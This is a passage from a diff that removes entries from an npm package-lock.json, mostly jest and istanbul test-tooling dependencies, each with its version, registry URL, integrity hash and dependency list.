"node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", - "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "engines": { - "node": ">=12.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": 